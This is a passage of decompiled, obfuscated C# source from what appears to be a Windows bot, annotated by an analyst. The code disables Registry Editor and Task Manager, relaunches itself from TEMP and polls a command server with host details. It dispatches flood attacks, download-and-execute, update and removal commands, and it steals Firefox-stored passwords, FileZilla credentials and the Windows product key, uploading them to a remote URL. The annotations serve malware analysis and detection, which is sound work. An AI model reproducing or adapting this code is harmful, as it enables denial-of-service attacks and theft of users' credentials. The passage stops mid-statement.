Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("yņɎ͓ёՄٖ݆\u087Eॱ\u0A4F\u0B73\u0C77ൾ\u0E75ཾၩᅅቕ\u137Eᑵᕧᙻᝠ\u187D\u1977ᩤ᭓᱙ᵤṢὯ\u2065≻⍛\u2455╼♷\u2777⡧⥬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŠɻͦѤթ١݀ࡏॅ"), (object) \u003F195\u003F.\u003F196\u003F("3"), RegistryValueKind.DWord);
}
// Optional (?164?): start a windowless child process with fixed arguments
// (inferred decode of the file name: "Netsh"; arguments not decoded here).
if (\u003F1\u003F.\u003F1\u003F.\u003F164\u003F)
{
try
{
new Process()
{
StartInfo = {
FileName = \u003F195\u003F.\u003F196\u003F("Kšɷͱѩ"),
Arguments = \u003F195\u003F.\u003F196\u003F("iŃɐ̓эՑهݖࡁॳੲଽ౯ൾ\u0E6E༹ၛᅢቤ፧ᑱᙦᝡᡢᥠᩨ᭤ᱠᵮḪ\u1F5A⁼Ⅶ≲⍠␤╬♤❧"),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
// Optional (?165?): create the HKCU key if missing, then write a DWord
// (inferred decode: "DisableRegistryTools" = "1").
if (\u003F1\u003F.\u003F1\u003F.\u003F165\u003F)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬")) == null)
{
Registry.CurrentUser.CreateSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"));
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("PźɡͰѲգ٫ݟ\u0869६\u0A63\u0B7A\u0C7C\u0D75\u0E7Fདၫᅬቮ\u1372"), (object) \u003F195\u003F.\u003F196\u003F("0"), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("PźɡͰѲգ٫ݟ\u0869६\u0A63\u0B7A\u0C7C\u0D75\u0E7Fདၫᅬቮ\u1372"), (object) \u003F195\u003F.\u003F196\u003F("0"), RegistryValueKind.DWord);
}
catch
{
}
}
// Optional (?166?): same pattern on the same key (inferred decode: "DisableTaskMgr" = "1").
if (\u003F1\u003F.\u003F1\u003F.\u003F166\u003F)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬")) == null)
{
Registry.CurrentUser.CreateSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"));
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("JŤɿͪѨե٭ݓ\u0867ॶ੯\u0B4E\u0C65\u0D73"), (object) \u003F195\u003F.\u003F196\u003F("0"), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("JŤɿͪѨե٭ݓ\u0867ॶ੯\u0B4E\u0C65\u0D73"), (object) \u003F195\u003F.\u003F196\u003F("0"), RegistryValueKind.DWord);
}
catch
{
}
}
}
// Optional relaunch (?172?): when not already running from the TEMP directory, write a one-line
// script under TEMP that quotes the original executable path and file name, run it without a
// window, start the TEMP copy, then exit this process. The script text is not decoded here;
// presumably it removes or renames the original file (TODO confirm).
if (\u003F1\u003F.\u003F1\u003F.\u003F172\u003F)
{
try
{
if (!Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑"))))
{
string str = \u003F195\u003F.\u003F196\u003F("6řɯ\u0379ѭզٲ\u070F\u0860੮ଡ") + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u003F195\u003F.\u003F196\u003F("\0Šɮ̧ѣս٭ݰ\u0876ड") + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u003F195\u003F.\u003F196\u003F(",Ŭɥͽѧԧٔݠ\u0874\u0A63\u0B75");
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ"));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ")),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F)
}
}.Start();
}
}
catch
{
}
Environment.Exit(0);
}
// Polling loop: never terminates. Starts with request target ?157?[0].
string str1 = \u003F1\u003F.\u003F1\u003F.\u003F157\u003F[0];
while (true)
{
try
{
// Request body: machine name, ?158?, UI-culture region, OS label and host fingerprint.
// Inferred decode of the field names: "pcname=", "&botver=", "&country=", "&winver=", "&hwid=".
// Values are concatenated without URL-encoding. This parameter set in a POST body is a
// candidate network signature.
string str2 = \u003F195\u003F.\u003F196\u003F("wťɫͥѮէؼ") + \u003F1\u003F.\u003F1\u003F.\u003F175\u003F + \u003F195\u003F.\u003F196\u003F(".ťɩͱѲզٰܼ") + \u003F1\u003F.\u003F1\u003F.\u003F158\u003F + \u003F195\u003F.\u003F196\u003F("/ūɨͳѫհٱݻ࠼") + \u003F1\u003F.\u003F1\u003F.\u003F160\u003F + \u003F195\u003F.\u003F196\u003F(".ŰɯͫѲզٰܼ") + \u003F1\u003F.\u003F1\u003F.\u003F179\u003F + \u003F195\u003F.\u003F196\u003F(" ŭɳͪѦԼ") + \u003F1\u003F.\u003F1\u003F.\u003F171\u003F;
string str3 = \u003F1\u003F.\u003F1\u003F.\u003F36\u003F(str1, str2);
if (str3.Length != 0)
{
// Non-empty reply: dispatch it through ?41? unless it equals the last one handled.
if (str3 != \u003F1\u003F.\u003F1\u003F.\u003F174\u003F)
{
\u003F1\u003F.\u003F1\u003F.\u003F41\u003F(str3);
\u003F1\u003F.\u003F1\u003F.\u003F174\u003F = str3;
}
}
else
{
// Empty reply: call one static method on each of ?2?, ?18?, ?14? and ?5? (types not in
// this view; presumably these stop whatever ?41? started - confirm) and forget the last reply.
try
{
\u003F2\u003F.\u003F21\u003F();
}
catch
{
}
try
{
\u003F18\u003F.\u003F78\u003F();
}
catch
{
}
try
{
\u003F14\u003F.\u003F48\u003F();
}
catch
{
}
try
{
\u003F5\u003F.\u003F25\u003F();
}
catch
{
}
\u003F1\u003F.\u003F1\u003F.\u003F174\u003F = string.Empty;
}
}
catch
{
// Any failure (including a network error or a null reply) switches to the second request
// target; nothing in this loop switches back to the first.
str1 = \u003F1\u003F.\u003F1\u003F.\u003F157\u003F[1];
}
// Fixed interval between requests: ?159? minutes (inferred decode: "5").
Thread.Sleep(Convert.ToInt32(\u003F1\u003F.\u003F1\u003F.\u003F159\u003F) * 60000);
}
}
// Loads nine native libraries by full path from one fixed sub-folder of Program Files, stores
// the handle of the last one in ?173?, resolves a named export from it with GetProcAddress (?33?)
// and calls it through delegate type ?7? with _param0, returning the export's result.
// Inferred decodes (confirm against ?195?.?196?): last library "nss3.dll", export "NSS_Init" -
// i.e. the Mozilla NSS library, which suggests access to a browser's stored-credential database.
// LoadLibrary results are not checked; a missing library leaves ?173? as IntPtr.Zero.
public static long \u003F39\u003F(string _param0)
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u003F195\u003F.\u003F196\u003F("MŝɠʹѤ\u0560٧ݫࠩॎ੮\u0B74ౠൢ\u0E6Cེၝ");
// Handles of the first eight loads are discarded; presumably these are dependencies of the last library.
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("aŤɰͪѺճطܼࠪ१੮୭"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("gŻɷʹбԪ٧ݮ\u086D"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("xūɥ̱Ъէٮݭ"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("yŤɣ͵бԪ٧ݮ\u086D"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("xŹɼͼѮժضܪ\u0867८੭"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("xŻɥ͡ѳգضܪ\u0867८੭"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("bŸɹͼѼծ٪ܶࠪ१੮୭"));
\u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("\u007FŤɬͽѧլ٨ܶࠪ१੮୭"));
\u003F1\u003F.\u003F1\u003F.\u003F173\u003F = \u003F1\u003F.\u003F1\u003F.\u003F37\u003F(str + \u003F195\u003F.\u003F196\u003F("fŴɵ̶Ъէٮݭ"));
return ((\u003F1\u003F.\u003F1\u003F.\u003F7\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("FŔɕ͚эխ٫ݵ")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F7\u003F)))(_param0);
}
// Resolves a second named export from the module handle in ?173? (set by ?39?) and calls it
// through delegate type ?10?, forwarding all four arguments and returning its int result.
// The export name is obfuscated and not decoded here.
// Depends on ?39? having run first: otherwise ?173? is IntPtr.Zero and GetProcAddress is
// called with a null module handle.
public static int \u003F40\u003F(
IntPtr _param0,
IntPtr _param1,
StringBuilder _param2,
int _param3)
{
return ((\u003F1\u003F.\u003F1\u003F.\u003F10\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("Xņɇ͑ѳբٵܹ࠺॒ੈ୮౩\u0E6Cར၄ᅰቢ፥ᑧᕳ")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F10\u003F)))(_param0, _param1, _param2, _param3);
}
// Analyst summary: command dispatcher of the sample. _param0 is one command string; it is
// split on '*' into fields, field 0 is matched by prefix against obfuscated keywords and the
// remaining fields are the handler's arguments (field 1 is a host, URL or machine name
// depending on the handler).
// Every handler, and the method as a whole, is wrapped in an empty catch, so malformed or
// short commands fail silently and leave no error trace.
// NOTE(review): all literals are decoded at run time by \u003F195\u003F.\u003F196\u003F, which is not
// part of this chunk. Reading them as index-keyed XOR (an inference from the literals) gives
// the keywords "synflood", "httpflood", "udpflood", "icmpflood", "steal", "downandexe",
// "visit", "update" and "remove", plus "TEMP", "POST", ".log", ".exe" and "\delete.bat" for
// the helper literals - confirm against the decoder before using them as indicators.
private static void \u003F41\u003F(string _param0)
{
try
{
string[] strArray = _param0.Split('*');
// Handler 1: copies one string and three integers from the command into static fields of
// \u003F2\u003F and starts it via \u003F20\u003F (class defined elsewhere).
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("{žɨͣѨլ٭ݥ")))
{
try
{
\u003F2\u003F.\u003F129\u003F = strArray[1];
\u003F2\u003F.\u003F132\u003F = Convert.ToInt32(strArray[2]);
\u003F2\u003F.\u003F134\u003F = Convert.ToInt32(strArray[3]);
\u003F2\u003F.\u003F80\u003F = Convert.ToInt32(strArray[4]);
\u003F2\u003F.\u003F20\u003F();
}
catch
{
}
}
// Handler 2: one string and one integer into \u003F18\u003F, then \u003F77\u003F.
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("ażɳͶѣը٬ݭ\u0865")))
{
try
{
\u003F18\u003F.\u003F129\u003F = strArray[1];
\u003F18\u003F.\u003F134\u003F = Convert.ToInt32(strArray[2]);
\u003F18\u003F.\u003F77\u003F();
}
catch
{
}
}
// Handler 3: one string and four integers into \u003F14\u003F, then \u003F47\u003F.
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("}ţɶͣѨլ٭ݥ")))
{
try
{
\u003F14\u003F.\u003F129\u003F = strArray[1];
\u003F14\u003F.\u003F132\u003F = Convert.ToInt32(strArray[2]);
\u003F14\u003F.\u003F134\u003F = Convert.ToInt32(strArray[3]);
\u003F14\u003F.\u003F183\u003F = Convert.ToInt32(strArray[4]);
\u003F14\u003F.\u003F87\u003F = Convert.ToInt32(strArray[5]);
\u003F14\u003F.\u003F47\u003F();
}
catch
{
}
}
// Handler 4: one string and four integers into \u003F5\u003F, then \u003F24\u003F.
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("`ūɪͶѣը٬ݭ\u0865")))
{
try
{
\u003F5\u003F.\u003F129\u003F = strArray[1];
\u003F5\u003F.\u003F132\u003F = Convert.ToInt32(strArray[2]);
\u003F5\u003F.\u003F134\u003F = Convert.ToInt32(strArray[3]);
\u003F5\u003F.\u003F140\u003F = Convert.ToInt32(strArray[4]);
\u003F5\u003F.\u003F87\u003F = Convert.ToInt32(strArray[5]);
\u003F5\u003F.\u003F24\u003F();
}
catch
{
}
}
// Handler 5: data collection. Builds a text report in the static \u003F178\u003F from three
// sources (a per-user database read through native decode calls, two XML files, and two
// HKLM registry values), writes it to a file, uploads the file to the URL in field 1 and
// deletes the local copy.
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("vŰɦͣѭ")))
{
try
{
string str1 = string.Empty;
// str2 is assigned but not read again in this method.
string str2 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u003F195\u003F.\u003F196\u003F("MŝɠʹѤ\u0560٧ݫࠩॎ੮\u0B74ౠൢ\u0E6Cེၝ");
// Sub-directories of a folder under the user's ApplicationData (literal obfuscated;
// presumably the browser's profile root - confirm).
string[] directories = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u003F195\u003F.\u003F196\u003F("EŕɸͬѼոٿݳࡍॖ\u0B7C౨൪\u0E64ིၕᅘት\u1369ᑣᕭᙯᝧᡲ"));
try
{
// Source 1: for each file whose path matches the decoded pattern, initialise the native
// library with the containing directory (\u003F39\u003F) and remember the file in \u003F177\u003F;
// if several match, the last one wins.
foreach (string path in directories)
{
foreach (string file in Directory.GetFiles(path))
{
if (Regex.IsMatch(file, \u003F195\u003F.\u003F196\u003F("}Ťɫͥѥէٻܩ\u0875ॴ੨୪\u0C76\u0D64")))
{
\u003F1\u003F.\u003F1\u003F.\u003F39\u003F(path);
\u003F1\u003F.\u003F1\u003F.\u003F177\u003F = file;
}
}
}
// \u003F16\u003F (defined elsewhere) opens the remembered file and returns the rows selected by
// the decoded query text as a DataTable.
DataTable dataTable = new \u003F16\u003F(\u003F1\u003F.\u003F1\u003F.\u003F177\u003F).\u003F51\u003F(\u003F195\u003F.\u003F196\u003F("Jŝɛ͓іՀسܸ࠱ॖ\u0A5Dୁీബ\u0E66ཥၳᅗቫ\u1369ᑢᕭ\u1771ᠺ"));
\u003F1\u003F.\u003F1\u003F.\u003F13\u003F obj1 = new \u003F1\u003F.\u003F1\u003F.\u003F13\u003F();
\u003F1\u003F.\u003F1\u003F.\u003F13\u003F obj2 = new \u003F1\u003F.\u003F1\u003F.\u003F13\u003F();
// One-time native call taking the value returned by \u003F43\u003F; its result is ignored.
\u003F1\u003F.\u003F1\u003F.\u003F42\u003F(\u003F1\u003F.\u003F1\u003F.\u003F43\u003F(), true, 0L);
foreach (DataRow row in (InternalDataCollectionBase) dataTable.Rows)
{
// One plain column is copied as-is; two further columns are passed through the native
// decode (\u003F40\u003F) and decrypt-style (\u003F44\u003F) calls.
str1 = str1 + \u003F195\u003F.\u003F196\u003F("]Ŭɪʹѣլٰݦ࠸ड") + row[\u003F195\u003F.\u003F196\u003F("`ŨɵͱѪբٯݤ")] + \u003F195\u003F.\u003F196\u003F("\v");
StringBuilder stringBuilder1 = new StringBuilder(row[\u003F195\u003F.\u003F196\u003F("tžɬͼѴռٿݯ\u086Dढ़ੴୣ\u0C77൪\u0E62\u0F6Fၤ")].ToString());
\u003F1\u003F.\u003F1\u003F.\u003F13\u003F structure1 = (\u003F1\u003F.\u003F1\u003F.\u003F13\u003F) Marshal.PtrToStructure(new IntPtr(\u003F1\u003F.\u003F1\u003F.\u003F40\u003F(IntPtr.Zero, IntPtr.Zero, stringBuilder1, stringBuilder1.Length)), typeof (\u003F1\u003F.\u003F1\u003F.\u003F13\u003F));
// A zero return with a non-zero length field is treated as success; the output bytes are
// copied out of native memory and appended as ASCII text.
if (\u003F1\u003F.\u003F1\u003F.\u003F44\u003F(ref structure1, ref obj1, 0) == 0 && obj1.\u003F182\u003F != 0)
{
byte[] numArray = new byte[obj1.\u003F182\u003F];
Marshal.Copy(new IntPtr(obj1.\u003F181\u003F), numArray, 0, obj1.\u003F182\u003F);
str1 = str1 + \u003F195\u003F.\u003F196\u003F("LŨɢ;Ѿճ٭ݵ\u0868।੩సഡ") + Encoding.ASCII.GetString(numArray) + \u003F195\u003F.\u003F196\u003F("\v");
}
StringBuilder stringBuilder2 = new StringBuilder(row[\u003F195\u003F.\u003F196\u003F("tžɬͼѴռٿݯ\u086Dक़\u0B75\u0C76\u0D73\u0E6C\u0F70ၥ")].ToString());
\u003F1\u003F.\u003F1\u003F.\u003F13\u003F structure2 = (\u003F1\u003F.\u003F1\u003F.\u003F13\u003F) Marshal.PtrToStructure(new IntPtr(\u003F1\u003F.\u003F1\u003F.\u003F40\u003F(IntPtr.Zero, IntPtr.Zero, stringBuilder2, stringBuilder2.Length)), typeof (\u003F1\u003F.\u003F1\u003F.\u003F13\u003F));
if (\u003F1\u003F.\u003F1\u003F.\u003F44\u003F(ref structure2, ref obj2, 0) == 0 && obj2.\u003F182\u003F != 0)
{
byte[] numArray = new byte[obj2.\u003F182\u003F];
Marshal.Copy(new IntPtr(obj2.\u003F181\u003F), numArray, 0, obj2.\u003F182\u003F);
str1 = str1 + \u003F195\u003F.\u003F196\u003F("ZŨɻʹѱժٶݷ࠸ड") + Encoding.ASCII.GetString(numArray) + \u003F195\u003F.\u003F196\u003F("\v");
}
str1 += \u003F195\u003F.\u003F196\u003F("\v");
}
}
catch
{
}
// The section is added to the report only when something was collected; the long literal is
// a decoded section header.
if (str1 != string.Empty)
\u003F1\u003F.\u003F1\u003F.\u003F178\u003F = \u003F1\u003F.\u003F1\u003F.\u003F178\u003F + \u003F195\u003F.\u003F196\u003F("¢ƭʬίҮ֩ڨޫࢪॕ\u0A54ୗౖ\u0D51ནၒᅝቜ፟ᑞᕙᙘ\u175Bᡚ᥅ᩄᭇ᱆ᵁṀὃ⁂⅍≌⍏\u244E╉♈❋⡊⥵⩴⭷ⱖ\u2D71\u2E70⽳ひㅽ㉼㍿㑾㕹㙸㝻㡺㥯㨈㬤㰾㴮㸬㼦䀰䅧䈖䌤䐷䔰䘵䜮䠲䥛䩍䬝䰖䴑丐伓倒儝刜匟吞唙嘘圛堚夥娄嬇将崁帀弃怂愍戌挏搎攉昈朋栊椵樴欷氶洱渰漳瀲焽爼猿琾甹瘸眻砺礥稤笧簦紡縠缣耢脭般茯萮蔩蘈蜋") + str1;
string str3 = string.Empty;
string str4 = string.Empty;
// Source 2: two XML files under ApplicationData. For every selected node four child values
// are read and formatted into one report line.
// NOTE(review): the literals appear to decode to a "\FileZilla\" path and the child names
// "Host", "User", "Pass", "Port" - confirm against the decoder.
try
{
XmlDocument xmlDocument = new XmlDocument();
xmlDocument.Load(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u003F195\u003F.\u003F196\u003F("FşɱͻѳՏٽݿ\u087E॰ੌ\u0B7C౧൹\u0E69སၫᅧቩ፠ᑣᕷᘪ\u177Bᡯᥭ"));
foreach (XmlNode selectNode in xmlDocument.DocumentElement.SelectNodes(\u003F195\u003F.\u003F196\u003F("]Ũɾͽѯջٻܨࡕॠ\u0A76\u0B75౧\u0D73")))
{
string str5 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("LŬɱ͵")).FirstChild.Value;
string str6 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("QŰɧͳ")).FirstChild.Value;
string str7 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("TŢɱͲ")).FirstChild.Value;
string str8 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("TŬɰ͵")).FirstChild.Value;
str3 = str3 + \u003F195\u003F.\u003F196\u003F("[Ţɴͳѡձظܡ") + str5 + \u003F195\u003F.\u003F196\u003F("\u0005Ōɨ͢Ѿվٳݭ\u0875२\u0A64୩സม") + str6 + \u003F195\u003F.\u003F196\u003F("\u0001ŚɨͻѴձ٪ݶ\u0877सਡ") + str7 + \u003F195\u003F.\u003F196\u003F("\rŖɪͶѷԸء") + str8 + \u003F195\u003F.\u003F196\u003F("\bċ");
}
}
catch
{
}
try
{
XmlDocument xmlDocument = new XmlDocument();
xmlDocument.Load(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u003F195\u003F.\u003F196\u003F("@ŝɳ͵ѽՍٿݹ\u0878ॲ\u0A4Eୣ\u0C75൬\u0E6Bལၸᅸቯ\u137Bᑾᕢᙴ\u1776ᠪ\u197Bᩯ᭭"));
foreach (XmlNode selectNode in xmlDocument.DocumentElement.SelectNodes(\u003F195\u003F.\u003F196\u003F("FŶɱʹѾջٝݨ\u087E੯\u0B7B\u0C7Bന๕འၶᅵቧ\u1373")))
{
string str9 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("LŬɱ͵")).FirstChild.Value;
string str10 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("QŰɧͳ")).FirstChild.Value;
string str11 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("TŢɱͲ")).FirstChild.Value;
string str12 = selectNode.SelectSingleNode(\u003F195\u003F.\u003F196\u003F("TŬɰ͵")).FirstChild.Value;
str4 = str4 + \u003F195\u003F.\u003F196\u003F("[Ţɴͳѡձظܡ") + str9 + \u003F195\u003F.\u003F196\u003F("\u0005Ōɨ͢Ѿվٳݭ\u0875२\u0A64୩സม") + str10 + \u003F195\u003F.\u003F196\u003F("\u0001ŚɨͻѴձ٪ݶ\u0877सਡ") + str11 + \u003F195\u003F.\u003F196\u003F("\rŖɪͶѷԸء") + str12 + \u003F195\u003F.\u003F196\u003F("\bċ");
}
}
catch
{
}
if (str3 != string.Empty | str4 != string.Empty)
\u003F1\u003F.\u003F1\u003F.\u003F178\u003F = \u003F1\u003F.\u003F1\u003F.\u003F178\u003F + \u003F195\u003F.\u003F196\u003F("¢ƭʬίҮ֩ڨޫࢪॕ\u0A54ୗౖ\u0D51ནၒᅝቜ፟ᑞᕙᙘ\u175Bᡚ᥅ᩄᭇ᱆ᵁṀὃ⁂⅍≌⍏\u244E╉♈❋⡊⥵⩴⭷ⱖ\u2D71\u2E70⽳ひㅽ㉼㍿㑾㕹㙸㝻㡺㥯㨈㬤㰠㴮㸐㼠䀤䄫䈧䍥䐔䔢䘱䜲䠷䥐䩌䭙䱏䴛丐伓倒儝刜匟吞唙嘘圛堚夥娄嬇将崁帀弃怂愍戌挏搎攉昈朋栊椵樴欷氶洱渰漳瀲焽爼猿琾甹瘸眻砺礥稤笧簦紡縠缣耢脭般茯萮蔩蘈蜋") + str3 + str4;
string empty = string.Empty;
string str13 = string.Empty;
// Source 3: the same HKLM key is opened twice; a string value is read directly and a binary
// value is converted to text by \u003F12\u003F.\u003F46\u003F.
// NOTE(review): the first value name appears to decode to "ProductName"; together with the
// byte offsets used by \u003F46\u003F this looks like Windows product information - confirm.
// GetValue's second argument is the default returned when the value is missing, so in that
// case the byte[] cast throws and the empty catch swallows it.
try
{
RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("|Łɋ͘ќՋٛݍ\u087Bॺ੨୍ీ\u0D50๎ནၰᅸቩፀᑇᕍᙰ\u1776ᡳ\u1979ᩢ᭧ᰳᵜṅὌ⅍≸⍾\u2479╯♧\u277C⡑⥣⩷⭷ⱪ\u2D6D\u2E6F"));
if (registryKey1 != null)
empty = (string) registryKey1.GetValue(\u003F195\u003F.\u003F196\u003F("[ŸɦͬѲեٱ݊\u0862९\u0A64"));
RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("|Łɋ͘ќՋٛݍ\u087Bॺ੨୍ీ\u0D50๎ནၰᅸቩፀᑇᕍᙰ\u1776ᡳ\u1979ᩢ᭧ᰳᵜṅὌ⅍≸⍾\u2479╯♧\u277C⡑⥣⩷⭷ⱪ\u2D6D\u2E6F"));
if (registryKey2 != null)
str13 = \u003F1\u003F.\u003F1\u003F.\u003F12\u003F.\u003F46\u003F((byte[]) registryKey2.GetValue(\u003F195\u003F.\u003F196\u003F("TŦɩͤѸժ٦ݙ\u087A२\u0A62୰౧\u0D77๋ཥ"), (object) RegistryValueKind.DWord));
}
catch
{
}
if (empty != string.Empty | str13 != string.Empty)
\u003F1\u003F.\u003F1\u003F.\u003F178\u003F = \u003F1\u003F.\u003F1\u003F.\u003F178\u003F + \u003F195\u003F.\u003F196\u003F("¢ƭʬίҮ֩ڨޫࢪॕ\u0A54ୗౖ\u0D51ནၒᅝቜ፟ᑞᕙᙘ\u175Bᡚ᥅ᩄᭇ᱆ᵁṀὃ⁂⅍≌⍏\u244E╉♈❋⡊⥵⩴⭷ⱖ\u2D71\u2E70⽳ひㅽ㉼㍿㑾㕹㙸㝻㡺㥯㨙㬤㰢㴯㸥㼾䀻䅧䈅䌁䑩䔈䘧䜸䡠䤕䨔䬗䰖䴑丐伓倒儝刜匟吞唙嘘圛堚夥娄嬇将崁帀弃怂愍戌挏搎攉昈朋栊椵樴欷氶洱渰漳瀲焽爼猿琾甹瘸眻砺礥稤笧簦紡縠缣耢脭般茯萮蔩蘈蜋") + empty + \u003F195\u003F.\u003F196\u003F("8ġ") + str13 + \u003F195\u003F.\u003F196\u003F("\v");
// Staging and exfiltration: the report is written to a file named after the machine in the
// directory given by an environment variable, uploaded to the URL in field 1 with
// WebClient.UploadFile, then deleted. Each step has its own empty catch, so the upload is
// attempted even if the write failed and the delete even if the upload failed.
// Detection note: the short-lived file named after the host and the outbound file upload
// from a non-browser process are the observable artefacts of this handler.
try
{
StreamWriter streamWriter = new StreamWriter(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + Environment.MachineName + \u003F195\u003F.\u003F196\u003F("*ůɭͦ"));
